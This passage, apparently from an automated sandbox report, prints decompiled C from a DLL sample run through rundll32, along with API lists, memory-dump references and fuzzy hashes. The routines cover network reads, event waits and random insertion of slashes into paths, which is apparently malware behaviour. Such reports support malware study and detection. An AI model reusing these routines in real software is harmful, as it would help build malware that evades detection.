                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: c56ac168dbcbe7a85cfe71b64e2fb2c3a86b35388083c1e2e2e938373eac4cf2
                                          • Instruction ID: afa3f6aaa227ff71a66d7e6e30c475e3b680319de1880f8c5fa6981f77258c30
                                          • Opcode Fuzzy Hash: c56ac168dbcbe7a85cfe71b64e2fb2c3a86b35388083c1e2e2e938373eac4cf2
                                          • Instruction Fuzzy Hash: 69418D71A00304BFEB719FA1CD48EAF7BBEEF89700B158929F642E1190E771A544CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06778F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E06778F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x677d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x677d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E067758BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x677d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E0677147E(_v16);
							if(_t58 == 0) {
								_t58 = E067716DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E06779D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E06779D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x06778f17
                                          0x06778f1c
                                          0x06778f1e
                                          0x06778f23
                                          0x06778f24
                                          0x06778f29
                                          0x06778f2a
                                          0x06778f35
                                          0x06778f66
                                          0x06778f6b
                                          0x0677902e
                                          0x06779031
                                          0x06779037
                                          0x06779037
                                          0x06778f78
                                          0x06778f80
                                          0x0677902b
                                          0x00000000
                                          0x0677902b
                                          0x06778f8b
                                          0x06778f90
                                          0x06778f95
                                          0x0677901d
                                          0x0677901e
                                          0x0677901e
                                          0x06779024
                                          0x00000000
                                          0x06779024
                                          0x06778f9b
                                          0x06778f9d
                                          0x06778fa3
                                          0x06778fa4
                                          0x06778fa4
                                          0x06778fa7
                                          0x06778faa
                                          0x06778fb0
                                          0x06778fb5
                                          0x06778fb6
                                          0x06778fbb
                                          0x06778fbe
                                          0x06778fc9
                                          0x00000000
                                          0x00000000
                                          0x06778fd1
                                          0x06778fd9
                                          0x06779002
                                          0x06779005
                                          0x0677900c
                                          0x06779017
                                          0x06779017
                                          0x00000000
                                          0x0677900c
                                          0x06778fe5
                                          0x06778fe9
                                          0x00000000
                                          0x00000000
                                          0x06778feb
                                          0x06778ff0
                                          0x00000000
                                          0x00000000
                                          0x06778ff2
                                          0x06778ff2
                                          0x06778ff7
                                          0x00000000
                                          0x00000000
                                          0x06778ff9
                                          0x06778ffa
                                          0x06778ffd
                                          0x06778ffd
                                          0x06778fa4
                                          0x06778f3d
                                          0x06778f45
                                          0x06778f5e
                                          0x06778f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x06778f60
                                          0x06778f51
                                          0x06778f55
                                          0x00000000
                                          0x00000000
                                          0x06778f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 06778F1E
                                          • GetLastError.KERNEL32 ref: 06778F37
                                            • Part of subcall function 06779D3A: WaitForMultipleObjects.KERNEL32(00000002,0677AA33,00000000,0677AA33,?,?,?,0677AA33,0000EA60), ref: 06779D55
                                          • ResetEvent.KERNEL32(?), ref: 06778FB0
                                          • GetLastError.KERNEL32 ref: 06778FCB
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: ad7e6f045ecc6d90384bc1a8503998ef3f6bc30bb58dc2837392bebca5be16bf
                                          • Instruction ID: 3dc990272991e509ee3c082cc9532c8acb802075d462d072c81ccdd4739fc98a
                                          • Opcode Fuzzy Hash: ad7e6f045ecc6d90384bc1a8503998ef3f6bc30bb58dc2837392bebca5be16bf
                                          • Instruction Fuzzy Hash: 6031B832A20605EFDFA2DBA4CC44E6E77BAEF88350F154528E751D7190EB70E941DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067772F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E067772F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x677d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x677d2a4; // 0x4ca5a8
				_t3 = _t8 + 0x677e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E06776AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x677d2a8, 1, 0, _t30);
					E0677147E(_t30);
				}
				_t12 =  *0x677d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E067756A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E06771493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x677d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E06777827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x067772f3
                                          0x067772fa
                                          0x06777304
                                          0x06777308
                                          0x0677730e
                                          0x0677731d
                                          0x06777324
                                          0x06777328
                                          0x0677733a
                                          0x0677733c
                                          0x0677733c
                                          0x06777341
                                          0x06777348
                                          0x0677739f
                                          0x0677739f
                                          0x067773a5
                                          0x067773a7
                                          0x067773a7
                                          0x067773b1
                                          0x067773b5
                                          0x067773c7
                                          0x067773c7
                                          0x067773cb
                                          0x067773d1
                                          0x067773d1
                                          0x00000000
                                          0x06777361
                                          0x06777366
                                          0x0677736e
                                          0x06777372
                                          0x06777376
                                          0x06777376
                                          0x06777383
                                          0x06777387
                                          0x0677738b
                                          0x067773e0
                                          0x067773e6
                                          0x067773e6
                                          0x06777399
                                          0x0677739d
                                          0x067773d4
                                          0x067773d6
                                          0x067773d9
                                          0x067773d9
                                          0x00000000
                                          0x067773d6
                                          0x0677739d
                                          0x00000000
                                          0x06777387

                                          APIs
                                            • Part of subcall function 06776AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,06772098,74666F53,00000000,?,0677D00C,?,?), ref: 06776B2D
                                            • Part of subcall function 06776AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 06776B51
                                            • Part of subcall function 06776AF7: lstrcat.KERNEL32(00000000,00000000), ref: 06776B59
                                          • CreateEventA.KERNEL32(0677D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 06777333
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0677555B,00000000,00000000,?,00000000,?,0677555B,?,?,?), ref: 06777393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 067773C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 067773D9
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 26a6e8561d45832dd7c15400dbc4fa2fcb67afe030d573fa1d398c4262a6089e
                                          • Instruction ID: 33cd16167cae70b29710646aa78df643ec050ef122023bb61f46725bc54b8905
                                          • Opcode Fuzzy Hash: 26a6e8561d45832dd7c15400dbc4fa2fcb67afe030d573fa1d398c4262a6089e
                                          • Instruction Fuzzy Hash: CD210772E103929BCFB55A7C9C84A7B739AFF88714B054625FE61EB148DB70C801C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E0677A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x677d140; // 0x677ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E067758BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0677147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E06779D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x0677a1f1
                                          0x0677a1f1
                                          0x0677a1fb
                                          0x0677a201
                                          0x0677a204
                                          0x0677a208
                                          0x0677a20e
                                          0x0677a213
                                          0x0677a22c
                                          0x0677a22f
                                          0x0677a233
                                          0x0677a237
                                          0x0677a238
                                          0x0677a23d
                                          0x0677a240
                                          0x0677a247
                                          0x0677a24e
                                          0x0677a2a1
                                          0x0677a2a7
                                          0x0677a2ad
                                          0x0677a2e8
                                          0x0677a2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677a2ad
                                          0x0677a254
                                          0x00000000
                                          0x0677a25b
                                          0x0677a269
                                          0x0677a26c
                                          0x0677a26f
                                          0x0677a27b
                                          0x0677a27f
                                          0x0677a2e1
                                          0x0677a281
                                          0x0677a284
                                          0x0677a288
                                          0x0677a289
                                          0x0677a28a
                                          0x0677a28c
                                          0x0677a293
                                          0x0677a2d1
                                          0x0677a2dc
                                          0x0677a295
                                          0x0677a298
                                          0x0677a29c
                                          0x0677a29c
                                          0x0677a293
                                          0x00000000
                                          0x0677a27f
                                          0x0677a254
                                          0x0677a218
                                          0x0677a21e
                                          0x0677a221
                                          0x0677a226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677a2b6
                                          0x0677a2be
                                          0x0677a2c3
                                          0x0677a2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0677A208
                                          • SetEvent.KERNEL32(?), ref: 0677A218
                                          • GetLastError.KERNEL32 ref: 0677A2A1
                                            • Part of subcall function 06779D3A: WaitForMultipleObjects.KERNEL32(00000002,0677AA33,00000000,0677AA33,?,?,?,0677AA33,0000EA60), ref: 06779D55
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • GetLastError.KERNEL32(00000000), ref: 0677A2D6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 075fe6191633ac2944517212fa2ff1f414a8c4384b18da7031b2aefa19779023
                                          • Instruction ID: 6f3017172f2c3641acb133627a9ba39401d6e3a4078d85e21a40f3fb62ac5cef
                                          • Opcode Fuzzy Hash: 075fe6191633ac2944517212fa2ff1f414a8c4384b18da7031b2aefa19779023
                                          • Instruction Fuzzy Hash: AD312EB5D00309EFEF61DFE6CC849AEBBB8EF49204F10896AE642E2140D7319A45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067754AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E067754AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E06774F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E06775749(_t23);
						}
					}
					return _t38;
				}
				if(E06779138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x677d2a8, 1, 0,  *0x677d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E06779575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0677A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E0677568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E067772F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x067754ac
                                          0x067754b9
                                          0x067754bf
                                          0x067754c0
                                          0x067754c1
                                          0x067754c2
                                          0x067754c3
                                          0x067754c7
                                          0x067754d3
                                          0x067754d7
                                          0x0677555f
                                          0x0677555f
                                          0x06775562
                                          0x06775564
                                          0x0677556c
                                          0x06775572
                                          0x06775575
                                          0x06775575
                                          0x06775572
                                          0x06775580
                                          0x06775580
                                          0x067754ea
                                          0x067754ec
                                          0x067754ec
                                          0x06775503
                                          0x06775507
                                          0x0677550a
                                          0x06775515
                                          0x0677551c
                                          0x0677551c
                                          0x06775525
                                          0x06775529
                                          0x06775537
                                          0x0677552b
                                          0x0677552b
                                          0x0677552c
                                          0x0677552d
                                          0x0677552e
                                          0x0677552f
                                          0x06775530
                                          0x06775530
                                          0x0677553c
                                          0x0677553f
                                          0x06775543
                                          0x06775545
                                          0x06775545
                                          0x0677554c
                                          0x00000000
                                          0x0677554e
                                          0x0677554e
                                          0x0677555b
                                          0x00000000
                                          0x0677555b

                                          APIs
                                          • CreateEventA.KERNEL32(0677D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 067754FD
                                          • SetEvent.KERNEL32(00000000), ref: 0677550A
                                          • Sleep.KERNEL32(00000BB8), ref: 06775515
                                          • CloseHandle.KERNEL32(00000000), ref: 0677551C
                                            • Part of subcall function 06779575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0677553C,?,0677553C,?,?,?,?,?,0677553C,?), ref: 0677964F
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 1c769f768d84fa7d3fcc62bd2449d1ae79347ff995dc63db29f50f3165daa76b
                                          • Instruction ID: ba0fd4517a307a30533a4b40f8da0755d46b11501e4c2a051434cd2325ba92ac
                                          • Opcode Fuzzy Hash: 1c769f768d84fa7d3fcc62bd2449d1ae79347ff995dc63db29f50f3165daa76b
                                          • Instruction Fuzzy Hash: E3214872D00115AFDF90BFE4DC849AE77BBEF44254B058425EB22E7100DE74DA41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06771295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E06771295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E067758BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x067712a1
                                          0x067712a5
                                          0x067712a6
                                          0x067712a7
                                          0x067712a9
                                          0x067712ab
                                          0x067712ae
                                          0x067712b3
                                          0x0677134a
                                          0x06771351
                                          0x06771351
                                          0x067712bc
                                          0x067712c3
                                          0x067712d3
                                          0x067712d3
                                          0x067712d9
                                          0x067712db
                                          0x067712e0
                                          0x067712e9
                                          0x067712ef
                                          0x067712f4
                                          0x067712ff
                                          0x06771303
                                          0x06771305
                                          0x06771306
                                          0x0677130f
                                          0x06771313
                                          0x06771324
                                          0x06771315
                                          0x0677131a
                                          0x0677131f
                                          0x0677132e
                                          0x0677132e
                                          0x06771303
                                          0x06771334
                                          0x0677133a
                                          0x0677133a
                                          0x06771343
                                          0x06771348
                                          0x06771348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 9c679204c7ed4dd8a1f7773a1e3bd1a650cad6efa36575018f7b2ebe9dee4f38
                                          • Instruction ID: 25776a8a1e2cdfd6e0027553fe98401fff45d653fadaa36329b1a2c77839d117
                                          • Opcode Fuzzy Hash: 9c679204c7ed4dd8a1f7773a1e3bd1a650cad6efa36575018f7b2ebe9dee4f38
                                          • Instruction Fuzzy Hash: FF21607590120AEFDB51DFA4C8889DEBBB9FF48200B1481A9EA11E7200EB30DA01CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06774858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E06774858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x677d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x677d250; // 0x72601424
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x677d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x06774860
                                          0x06774863
                                          0x06774869
                                          0x06774881
                                          0x06774883
                                          0x06774888
                                          0x0677488a
                                          0x0677488d
                                          0x0677488f
                                          0x06774892
                                          0x06774894
                                          0x06774894
                                          0x06774896
                                          0x067748a1
                                          0x067748a6
                                          0x067748b7
                                          0x067748bf
                                          0x067748c4
                                          0x067748c7
                                          0x067748ca
                                          0x067748cc
                                          0x067748cf
                                          0x067748d2
                                          0x067748d2
                                          0x067748d5
                                          0x067748e0
                                          0x067748e5
                                          0x067748ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06774DBF,00000000,?,?,067752FE,?,06C495B0), ref: 06774863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0677487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,06774DBF,00000000,?,?,067752FE,?,06C495B0), ref: 067748BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 067748E0
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 7e64900107fbf2ae752970dd7bfe5040f98aeb1ae2711f2acb7027ad144a713d
                                          • Instruction ID: 6311a9a559b78bbc5b183b5dd5651312221b8a54254525dfddfd8c461457b322
                                          • Opcode Fuzzy Hash: 7e64900107fbf2ae752970dd7bfe5040f98aeb1ae2711f2acb7027ad144a713d
                                          • Instruction Fuzzy Hash: F11125B2A00158AFC710CF69DD88DAEBBEEEFD42A0B054176F604D7254EB709E00C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06776AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E06776AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E06776F89(_t8, _t1);
				_t16 = E067758BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E06779038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E067758BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E0677147E(_t16);
				}
				return _t18;
			}









                                          0x06776b02
                                          0x06776b03
                                          0x06776b06
                                          0x06776b08
                                          0x06776b13
                                          0x06776b17
                                          0x06776b1c
                                          0x06776b20
                                          0x06776b28
                                          0x06776b2d
                                          0x06776b35
                                          0x06776b35
                                          0x06776b3e
                                          0x06776b42
                                          0x06776b48
                                          0x06776b4b
                                          0x06776b51
                                          0x06776b51
                                          0x06776b59
                                          0x06776b59
                                          0x06776b60
